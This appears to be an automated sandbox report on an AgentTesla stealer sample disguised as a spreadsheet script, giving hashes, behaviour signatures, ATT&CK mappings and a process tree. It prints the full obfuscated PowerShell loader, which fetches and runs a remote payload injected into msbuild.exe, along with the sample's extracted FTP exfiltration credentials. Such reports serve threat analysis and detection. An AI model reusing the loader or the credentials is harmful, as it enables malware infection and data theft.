agenttesla | 755d482683b5e165fae72bf4fc4d528f7c8cfada4e6b1aff7732a3f427f0ee13

General

Target

MTE-QT-20231211105 xls.wsf
Size

82KB
MD5

36dfda4c860dfbd57b093ba713f02b95
SHA1

fbe78a99a1d09521caf96e79affe068f8dfa8ad2
SHA256

755d482683b5e165fae72bf4fc4d528f7c8cfada4e6b1aff7732a3f427f0ee13
SHA512

6852606d27e6b77cf69eb709f3f7b108a25d8d7bb77c88c34e88303c0a411d118393a72d5de303e4e546cbfca1f21bdd04fc65089413881f2db58ed9a8f0f303
SSDEEP

1536:cXL/J9xd6SgcIL8FJgV9faDdYG9zkEnSw3g/aq+BLmYe7293I:MrJ9xsncIAJG9fahYGJnpwCZx7ey93I

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: ftp
Host:
ftp://ftp.cefin.bg
Port:
21
Username:
[email protected]
Password:
#UuXy?6cIbL+

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

11 api.ipify.org
12 api.ipify.org
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

msbuild.exe

pid process

848 msbuild.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exemsbuild.exe

pid process

2612 powershell.exe
848 msbuild.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2612 set thread context of 848 2612 powershell.exe msbuild.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exemsbuild.exe

pid process

3020 powershell.exe
2612 powershell.exe
848 msbuild.exe
848 msbuild.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2612 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exemsbuild.exe

description pid process

Token: SeDebugPrivilege 3020 powershell.exe
Token: SeDebugPrivilege 2612 powershell.exe
Token: SeDebugPrivilege 848 msbuild.exe

flow	ioc
11	api.ipify.org
12	api.ipify.org

pid	process
848	msbuild.exe

pid	process
2612	powershell.exe
848	msbuild.exe

description	pid	process	target process
PID 2612 set thread context of 848	2612	powershell.exe	msbuild.exe

pid	process
3020	powershell.exe
2612	powershell.exe
848	msbuild.exe
848	msbuild.exe

pid	process
2612	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeDebugPrivilege	2612	powershell.exe
Token: SeDebugPrivilege	848	msbuild.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2920 wrote to memory of 3020	2920	WScript.exe	powershell.exe
PID 2920 wrote to memory of 3020	2920	WScript.exe	powershell.exe
PID 2920 wrote to memory of 3020	2920	WScript.exe	powershell.exe
PID 3020 wrote to memory of 2612	3020	powershell.exe	powershell.exe
PID 3020 wrote to memory of 2612	3020	powershell.exe	powershell.exe
PID 3020 wrote to memory of 2612	3020	powershell.exe	powershell.exe
PID 3020 wrote to memory of 2612	3020	powershell.exe	powershell.exe
PID 2612 wrote to memory of 848	2612	powershell.exe	msbuild.exe
PID 2612 wrote to memory of 848	2612	powershell.exe	msbuild.exe
PID 2612 wrote to memory of 848	2612	powershell.exe	msbuild.exe
PID 2612 wrote to memory of 848	2612	powershell.exe	msbuild.exe
PID 2612 wrote to memory of 848	2612	powershell.exe	msbuild.exe
PID 2612 wrote to memory of 848	2612	powershell.exe	msbuild.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MTE-QT-20231211105 xls.wsf"
1⤵
- Suspicious use of WriteProcessMemory
PID:2920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Trols9 ($Omtalens55){$Gregers = $Omtalens55.Length-1; For ($Regionplanlovenes45=6; $Regionplanlovenes45 -lt $Gregers){$Tumlede=$Tumlede+$Omtalens55.Substring( $Regionplanlovenes45, 1);$Regionplanlovenes45+=7;}$Tumlede;}$Mobilized=Trols9 'ExpedihTutorst Thymot valsepAntipa:Indtrn/Myriam/BaandsrtobaksaUterotc UplickMegnetosstninoUntripnGorgon.Genansn SyncyeAnnalitambuli/BndselwSpiritpSnvret- Knokli OvertnSkrigec chaptlDataneukonstrdErkende Udposs Laane/TindinfBiddaboEmulsinbaalbatPleurosFlugte/ AllotDFljssoeTipoldp PseudoSahrastTychoseHusbestSweatysImpeti.KartofaLyksalsFringbi Bjrne ';$Tumlede01=Trols9 'BeweariBagleae PerfexSulfit ';$Udsteningens140 = Trols9 ' Chevi\MultifsBeamliyPyrexrsStormvwturaluoLacmoiwSundhe6Noncir4Imbell\ PlundWFremoviAntimenFabelddForfreo CrinawShewbrsChairlPSolifuoEmanerwSupermeEnaarirBirketSmanichhSojaolemergedlNitriflInfant\LancervRaaste1Dishab.Reindi0 Scaff\TravelpAnstteopastorw HeldteKunzslr RaimusBarytihSangfoeCataphlCoumarlUnmana.felthre UhumsxTekstre Hytte ';. ($Tumlede01) (Trols9 'Friluf$ SkureS Demenp besvrrDiaplai NymphnAssyrig MrkesfBeefisiTvedeleBladmalSprjtedHallmo9 nonli2spisek2 githe=Mongre$ ArmigeUnflednPantomvwaygon:LoudmawSkemalikulturnadvarsdnumberiHeroicrForcer ') ;. ($Tumlede01) (Trols9 'Pulver$JehjdeU LandldLamelksKrngedt IndsnePrvelsnTenonti exubenBullfigremodue OrdenniniquisRatsta1 Kmpev4Hffdin0Kulara=Troldk$BiblioSUnleaspTystnerDorseriastraynkvalitgLillebfAtsaraiSearbieSwahillUninted Taluk9Initia2Alpeho2Person+mendac$PrikkeU CootsdAfsendsAbneurtFletvreTempornUnoffiiAarefonUndvrlgEkspreeBughinnSummarsSveske1 Prers4Editss0Prikke ') ;& ($Tumlede01) (Trols9 'Doedse$SekundUmirzabnSwiwetoJobkoduRenickt BroilsparrinpLustfuePneumaaMavedik DespoaEftermbUdbanklFundame Signa Spexe= Beskn Unicor(Timote(outtakgOverimwJomfrumElectriMyriam RappeewResumeiPakkefnMerino3 Reser2 skyde_ChondrpRundkir HalidoalkohocUnshameBudstisBeregnsBrsmgl Sludre-unconfFCondup FratrkP HjemmrProbasoSygerscSlughaeChanelsBeetlesDryppeIBoettedTrygle=Bordlb$Asphyx{FreakiPStandsIRecursD Skald}Precon)Medlem.attribCGarancoBrndsemEugenim Hemiba StyltnTrophoduncontLEchinii ConsenReutteeWeaken)Borger Interv-SemifasLokalepBarycelDefinii tilsvt Berve Ungibb[CadavecAphorihHimyaraCurucarHydrag] Inspi3 Sekon4 Canew ');. ($Tumlede01) (Trols9 'Undsee$ GingeVKodereiAdresst FyrtarBlacktiSofaerfNonspiiCasefyaimmortbAfloeslScratceFuncti Operat=Marksk Tunes$IrrefuUBycentnStandsoBridgeuWorsumtKreerisHorehupKvadrieDesignaRingekk Domina TetrabNiveaulDenotee night[Ublufo$RewaxeUIsdkkenGrederoFutteruPaahngt OpsgnsUdmarvpMusikheStophoa PeriekCactalaDdsscebColonnlgiftsteOpmunt.BalaencLinireo TaageuStudenndrowsyt Fakul- Blist2Desert] Opgav ');. ($Tumlede01) (Trols9 ' infik$regaraOKarattvRedockeArchesrSteatifbesaeti tichosSoamguhTerritiFremadnObelisgMoeurs= Strik(untresTSknsvieIndekss TamantTelety-pseudoP GraapaScrapptKrysanhHomost Pumaen$ TimbrU MicrodTaksensFunnymtAdvente VejgrndrammeiBehftenafsnitgtidsgleAngstlnAntidas Halsl1Aquari4Talteg0Cikori) Udgaa agron-MacrenADusenbnTegnefd Ledel Bondek(Gynaec[dickieIpantatn carpetPyrogrPFakesotwildfirFlkham]Trnere: Tigge:ForholsNonglaiFrederzOmkldeeMorgne Omnic-PerfeceltappeqUnresp Gaults8Hasfor)Metalh ') ;if ($Overfishing) {. $Udsteningens140 $Vitrifiable;} else {;$Tumlede00=Trols9 'SonatiSTransptAdhorta ExplorStrepstKonsta-StyrinBHardwaiSikkert inters MultiTBesejlrClancuaLivstynAntismsRealitfSpurteeUncharr Light Wordst-RytmisSKommanonayarduWheerhrRugemacCapacieEksemp Vgtfor$HaandvMManifeosamovabIndmeliGrundplCayuseiIntellztechnieVitropd nonko Smaag- PteroDTrrehjeHowsoms OxyqutLrdneui JavannPartioa Electt UncaciPragmaoRensninUnnebu Nervin$OneyerSSkoggepOmnivirSnydetiPleistnBakonggMinutefBogfrii BinomeLineupl PriordBeaver9ideali2 Tongu2Giftur ';& ($Tumlede01) (Trols9 'bernet$IodosoSToxicopBladsyr BeastiEqipmen Kneelgudnvnef GenskiFlammeeUnpattlOverindWiener9Skvatm2unnece2Coreig=Levert$ FragmeThrowon RechavOrthot: ForveaEmboucp EurytpBravehd Absoladiscont DokumaServil ') ;& ($Tumlede01) (Trols9 ' DiluvILateramUnsomepElleryoVaccinrLundent Casal-MiniatM RefleoElysiudSelvtiuSubburlBarebaeFinifl FrdigpBJuryerirebatetDustfasLeadwoTAnhydrr ThingaFornysneastwasStablefVandaleLaaserrnation ') ;$Springfield922=$Springfield922+'\Juradannelse.Lui';while (-not $intentively) {. ($Tumlede01) (Trols9 'Vandga$disseiiDemandnAntichtdancereforefanBlasfetSexualiGorgervYderbaeSpejlilLuftspyHavbej=Nonexi(NicotiTSelvsteSemisisSafrantlungeb-AutomaPTheurga SkelstCitolah Halvl Vitri$LygtemSAandsepAreolorslageliSulfofn BaasigRhythmfModtagiMamhypeVotivelPopuladMeldin9Geneal2Unders2Akties)Ameios ') ;. ($Tumlede01) $Tumlede00;. ($Tumlede01) (Trols9 'PraletSDagblatSarkofa KlassrUnavaitEmissi-ChansoSCircuml Subtreindkome StttepBlinds renlig5Bundte ');}. ($Tumlede01) (Trols9 'Browle$TegnstTfisherrConquio FaktolorkestsSaintl Rabicf= Basqn RoyceGKonsoreRomanitUngtel-BeduncCBrushuo DispannonelutPollise Sprngn GifletMellem Mishan$ klespS SuperpPrecenrTidsleiRomersn Preprg lnklafLymphgiTroldmeHgnetal cyperdFolkem9hepato2Parcel2Rettig ');. ($Tumlede01) (Trols9 ' Afgif$schuleP TempeeSnailelNavigatUndereitadpolgCountreozonizrTargona Gastr Augus= Velgr Rural[TykkamSLarvifySleuthsZoopart DenereCastromBarner. RedunCLeasinoUdskrinSkumplvbghjore DovenrKroghgt Cozil]Colpor:Reclim:BenbruFEnzootrGollyhoGravremUdstedBRumbaraKreatisImpasteImperi6Explai4TrilreSKolonntQuaffirConfesi vaporn IndevgRestle(Liverw$ MetalTUnattarCorolloPlumicl Bygges Presi)Patted ');& ($Tumlede01) (Trols9 'Agglut$ BimplTPicachuTropicmParentl UnsepeFinansd ParalePoloni2 potpo Butiks=Magtfa Skovhu[ShoebiSGyrateyArberfsAksiomtProtateDamprum Hjlpe.NonstyTNynorse pladexPartictExpost.BogfriE BlundnCoronacDegresoGunslidGreengiBifaldnTmmerfg Semim]Cartwa:Retran:HypotrAdownheSVantenCMortifIHypercIVrnede.RangleG ParagePhthontNouritS adjuntTrafikrSammeniKitashn IsidagEjeste(Impart$LivsvaPUndergeFipperlSpookitSvinefiRubinegBasisbe ExcusrUrnegraPrivil) Sands ');& ($Tumlede01) (Trols9 'Micros$AcerouUWatersn KompadMoonrieFremdarVrdipacHopkinh FlucaaslaughnBarytacAssuraeForbunl Samspl Skatto OrdinrIndhol2Divant1 Vibro2 Tapet=Afsnit$TipienTChiroguSkraalm Tribul MeriteUdvikldTohndieUnders2Udelel.Uprises Blameu TraktbSubtwisreformtStabler Antigi Stronn Ionerg Skill(underm2Madaga7Fatsto8Unloos5interr0 Dagbo8Krumme,Hytten2Stlign7Undliv2 Hindu7Befali1Harves)Ernhar ');& ($Tumlede01) $Underchancellor212;}"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3020

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Trols9 ($Omtalens55){$Gregers = $Omtalens55.Length-1; For ($Regionplanlovenes45=6; $Regionplanlovenes45 -lt $Gregers){$Tumlede=$Tumlede+$Omtalens55.Substring( $Regionplanlovenes45, 1);$Regionplanlovenes45+=7;}$Tumlede;}$Mobilized=Trols9 'ExpedihTutorst Thymot valsepAntipa:Indtrn/Myriam/BaandsrtobaksaUterotc UplickMegnetosstninoUntripnGorgon.Genansn SyncyeAnnalitambuli/BndselwSpiritpSnvret- Knokli OvertnSkrigec chaptlDataneukonstrdErkende Udposs Laane/TindinfBiddaboEmulsinbaalbatPleurosFlugte/ AllotDFljssoeTipoldp PseudoSahrastTychoseHusbestSweatysImpeti.KartofaLyksalsFringbi Bjrne ';$Tumlede01=Trols9 'BeweariBagleae PerfexSulfit ';$Udsteningens140 = Trols9 ' Chevi\MultifsBeamliyPyrexrsStormvwturaluoLacmoiwSundhe6Noncir4Imbell\ PlundWFremoviAntimenFabelddForfreo CrinawShewbrsChairlPSolifuoEmanerwSupermeEnaarirBirketSmanichhSojaolemergedlNitriflInfant\LancervRaaste1Dishab.Reindi0 Scaff\TravelpAnstteopastorw HeldteKunzslr RaimusBarytihSangfoeCataphlCoumarlUnmana.felthre UhumsxTekstre Hytte ';. ($Tumlede01) (Trols9 'Friluf$ SkureS Demenp besvrrDiaplai NymphnAssyrig MrkesfBeefisiTvedeleBladmalSprjtedHallmo9 nonli2spisek2 githe=Mongre$ ArmigeUnflednPantomvwaygon:LoudmawSkemalikulturnadvarsdnumberiHeroicrForcer ') ;. ($Tumlede01) (Trols9 'Pulver$JehjdeU LandldLamelksKrngedt IndsnePrvelsnTenonti exubenBullfigremodue OrdenniniquisRatsta1 Kmpev4Hffdin0Kulara=Troldk$BiblioSUnleaspTystnerDorseriastraynkvalitgLillebfAtsaraiSearbieSwahillUninted Taluk9Initia2Alpeho2Person+mendac$PrikkeU CootsdAfsendsAbneurtFletvreTempornUnoffiiAarefonUndvrlgEkspreeBughinnSummarsSveske1 Prers4Editss0Prikke ') ;& ($Tumlede01) (Trols9 'Doedse$SekundUmirzabnSwiwetoJobkoduRenickt BroilsparrinpLustfuePneumaaMavedik DespoaEftermbUdbanklFundame Signa Spexe= Beskn Unicor(Timote(outtakgOverimwJomfrumElectriMyriam RappeewResumeiPakkefnMerino3 Reser2 skyde_ChondrpRundkir HalidoalkohocUnshameBudstisBeregnsBrsmgl Sludre-unconfFCondup FratrkP HjemmrProbasoSygerscSlughaeChanelsBeetlesDryppeIBoettedTrygle=Bordlb$Asphyx{FreakiPStandsIRecursD Skald}Precon)Medlem.attribCGarancoBrndsemEugenim Hemiba StyltnTrophoduncontLEchinii ConsenReutteeWeaken)Borger Interv-SemifasLokalepBarycelDefinii tilsvt Berve Ungibb[CadavecAphorihHimyaraCurucarHydrag] Inspi3 Sekon4 Canew ');. ($Tumlede01) (Trols9 'Undsee$ GingeVKodereiAdresst FyrtarBlacktiSofaerfNonspiiCasefyaimmortbAfloeslScratceFuncti Operat=Marksk Tunes$IrrefuUBycentnStandsoBridgeuWorsumtKreerisHorehupKvadrieDesignaRingekk Domina TetrabNiveaulDenotee night[Ublufo$RewaxeUIsdkkenGrederoFutteruPaahngt OpsgnsUdmarvpMusikheStophoa PeriekCactalaDdsscebColonnlgiftsteOpmunt.BalaencLinireo TaageuStudenndrowsyt Fakul- Blist2Desert] Opgav ');. ($Tumlede01) (Trols9 ' infik$regaraOKarattvRedockeArchesrSteatifbesaeti tichosSoamguhTerritiFremadnObelisgMoeurs= Strik(untresTSknsvieIndekss TamantTelety-pseudoP GraapaScrapptKrysanhHomost Pumaen$ TimbrU MicrodTaksensFunnymtAdvente VejgrndrammeiBehftenafsnitgtidsgleAngstlnAntidas Halsl1Aquari4Talteg0Cikori) Udgaa agron-MacrenADusenbnTegnefd Ledel Bondek(Gynaec[dickieIpantatn carpetPyrogrPFakesotwildfirFlkham]Trnere: Tigge:ForholsNonglaiFrederzOmkldeeMorgne Omnic-PerfeceltappeqUnresp Gaults8Hasfor)Metalh ') ;if ($Overfishing) {. $Udsteningens140 $Vitrifiable;} else {;$Tumlede00=Trols9 'SonatiSTransptAdhorta ExplorStrepstKonsta-StyrinBHardwaiSikkert inters MultiTBesejlrClancuaLivstynAntismsRealitfSpurteeUncharr Light Wordst-RytmisSKommanonayarduWheerhrRugemacCapacieEksemp Vgtfor$HaandvMManifeosamovabIndmeliGrundplCayuseiIntellztechnieVitropd nonko Smaag- PteroDTrrehjeHowsoms OxyqutLrdneui JavannPartioa Electt UncaciPragmaoRensninUnnebu Nervin$OneyerSSkoggepOmnivirSnydetiPleistnBakonggMinutefBogfrii BinomeLineupl PriordBeaver9ideali2 Tongu2Giftur ';& ($Tumlede01) (Trols9 'bernet$IodosoSToxicopBladsyr BeastiEqipmen Kneelgudnvnef GenskiFlammeeUnpattlOverindWiener9Skvatm2unnece2Coreig=Levert$ FragmeThrowon RechavOrthot: ForveaEmboucp EurytpBravehd Absoladiscont DokumaServil ') ;& ($Tumlede01) (Trols9 ' DiluvILateramUnsomepElleryoVaccinrLundent Casal-MiniatM RefleoElysiudSelvtiuSubburlBarebaeFinifl FrdigpBJuryerirebatetDustfasLeadwoTAnhydrr ThingaFornysneastwasStablefVandaleLaaserrnation ') ;$Springfield922=$Springfield922+'\Juradannelse.Lui';while (-not $intentively) {. ($Tumlede01) (Trols9 'Vandga$disseiiDemandnAntichtdancereforefanBlasfetSexualiGorgervYderbaeSpejlilLuftspyHavbej=Nonexi(NicotiTSelvsteSemisisSafrantlungeb-AutomaPTheurga SkelstCitolah Halvl Vitri$LygtemSAandsepAreolorslageliSulfofn BaasigRhythmfModtagiMamhypeVotivelPopuladMeldin9Geneal2Unders2Akties)Ameios ') ;. ($Tumlede01) $Tumlede00;. ($Tumlede01) (Trols9 'PraletSDagblatSarkofa KlassrUnavaitEmissi-ChansoSCircuml Subtreindkome StttepBlinds renlig5Bundte ');}. ($Tumlede01) (Trols9 'Browle$TegnstTfisherrConquio FaktolorkestsSaintl Rabicf= Basqn RoyceGKonsoreRomanitUngtel-BeduncCBrushuo DispannonelutPollise Sprngn GifletMellem Mishan$ klespS SuperpPrecenrTidsleiRomersn Preprg lnklafLymphgiTroldmeHgnetal cyperdFolkem9hepato2Parcel2Rettig ');. ($Tumlede01) (Trols9 ' Afgif$schuleP TempeeSnailelNavigatUndereitadpolgCountreozonizrTargona Gastr Augus= Velgr Rural[TykkamSLarvifySleuthsZoopart DenereCastromBarner. RedunCLeasinoUdskrinSkumplvbghjore DovenrKroghgt Cozil]Colpor:Reclim:BenbruFEnzootrGollyhoGravremUdstedBRumbaraKreatisImpasteImperi6Explai4TrilreSKolonntQuaffirConfesi vaporn IndevgRestle(Liverw$ MetalTUnattarCorolloPlumicl Bygges Presi)Patted ');& ($Tumlede01) (Trols9 'Agglut$ BimplTPicachuTropicmParentl UnsepeFinansd ParalePoloni2 potpo Butiks=Magtfa Skovhu[ShoebiSGyrateyArberfsAksiomtProtateDamprum Hjlpe.NonstyTNynorse pladexPartictExpost.BogfriE BlundnCoronacDegresoGunslidGreengiBifaldnTmmerfg Semim]Cartwa:Retran:HypotrAdownheSVantenCMortifIHypercIVrnede.RangleG ParagePhthontNouritS adjuntTrafikrSammeniKitashn IsidagEjeste(Impart$LivsvaPUndergeFipperlSpookitSvinefiRubinegBasisbe ExcusrUrnegraPrivil) Sands ');& ($Tumlede01) (Trols9 'Micros$AcerouUWatersn KompadMoonrieFremdarVrdipacHopkinh FlucaaslaughnBarytacAssuraeForbunl Samspl Skatto OrdinrIndhol2Divant1 Vibro2 Tapet=Afsnit$TipienTChiroguSkraalm Tribul MeriteUdvikldTohndieUnders2Udelel.Uprises Blameu TraktbSubtwisreformtStabler Antigi Stronn Ionerg Skill(underm2Madaga7Fatsto8Unloos5interr0 Dagbo8Krumme,Hytten2Stlign7Undliv2 Hindu7Befali1Harves)Ernhar ');& ($Tumlede01) $Underchancellor212;}"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2612

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:848

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NKJU1X5FW2CEPAOUGLF7.temp

Filesize
7KB

MD5
b5b9e1714469ec92cd4b546c62a5500a

SHA1
455d9c192136ac43deb1a161ac997c426330528b

SHA256
57aeaaa2e86abde5d698f15e351a308e78e0e1e8310d96ba969d6a7dc0146914

SHA512
7d2404da89fade3a664975338910ed8623cc895c069f3001b637821fcef35b6cdfde7295026aa2bcea4f13fad34c289e0c3ab6a9c87cc0f9118dd616ba6e6ffd

Download Submit
memory/848-40-0x000000006F130000-0x0000000070192000-memory.dmp

Filesize
16.4MB

Download
memory/848-39-0x0000000076E20000-0x0000000076FC9000-memory.dmp

Filesize
1.7MB

Download
memory/848-46-0x000000006E9A0000-0x000000006F08E000-memory.dmp

Filesize
6.9MB

Download
memory/848-44-0x000000006F130000-0x000000006F170000-memory.dmp

Filesize
256KB

Download
memory/848-42-0x0000000000E60000-0x0000000005AB0000-memory.dmp

Filesize
76.3MB

Download
memory/848-41-0x000000006F130000-0x0000000070192000-memory.dmp

Filesize
16.4MB

Download
memory/848-49-0x000000006E9A0000-0x000000006F08E000-memory.dmp

Filesize
6.9MB

Download
memory/2612-16-0x0000000002610000-0x0000000002650000-memory.dmp

Filesize
256KB

Download
memory/2612-38-0x0000000077010000-0x00000000770E6000-memory.dmp

Filesize
856KB

Download
memory/2612-15-0x0000000072E60000-0x000000007340B000-memory.dmp

Filesize
5.7MB

Download
memory/2612-34-0x0000000002610000-0x0000000002650000-memory.dmp

Filesize
256KB

Download
memory/2612-17-0x0000000002610000-0x0000000002650000-memory.dmp

Filesize
256KB

Download
memory/2612-18-0x0000000002610000-0x0000000002650000-memory.dmp

Filesize
256KB

Download
memory/2612-37-0x0000000076E20000-0x0000000076FC9000-memory.dmp

Filesize
1.7MB

Download
memory/2612-31-0x0000000072E60000-0x000000007340B000-memory.dmp

Filesize
5.7MB

Download
memory/2612-14-0x0000000072E60000-0x000000007340B000-memory.dmp

Filesize
5.7MB

Download
memory/2612-43-0x0000000072E60000-0x000000007340B000-memory.dmp

Filesize
5.7MB

Download
memory/2612-32-0x00000000051C0000-0x00000000051C1000-memory.dmp

Filesize
4KB

Download
memory/2612-33-0x0000000006390000-0x000000000AFE0000-memory.dmp

Filesize
76.3MB

Download
memory/3020-45-0x000007FEF4F60000-0x000007FEF58FD000-memory.dmp

Filesize
9.6MB

Download
memory/3020-28-0x000007FEF4F60000-0x000007FEF58FD000-memory.dmp

Filesize
9.6MB

Download
memory/3020-5-0x0000000002390000-0x0000000002398000-memory.dmp

Filesize
32KB

Download
memory/3020-30-0x0000000002700000-0x0000000002780000-memory.dmp

Filesize
512KB

Download
memory/3020-4-0x000000001B370000-0x000000001B652000-memory.dmp

Filesize
2.9MB

Download
memory/3020-10-0x0000000002700000-0x0000000002780000-memory.dmp

Filesize
512KB

Download
memory/3020-9-0x0000000002700000-0x0000000002780000-memory.dmp

Filesize
512KB

Download
memory/3020-6-0x000007FEF4F60000-0x000007FEF58FD000-memory.dmp

Filesize
9.6MB

Download
memory/3020-8-0x000007FEF4F60000-0x000007FEF58FD000-memory.dmp

Filesize
9.6MB

Download
memory/3020-11-0x0000000002700000-0x0000000002780000-memory.dmp

Filesize
512KB

Download
memory/3020-29-0x0000000002700000-0x0000000002780000-memory.dmp

Filesize
512KB

Download
memory/3020-7-0x0000000002700000-0x0000000002780000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing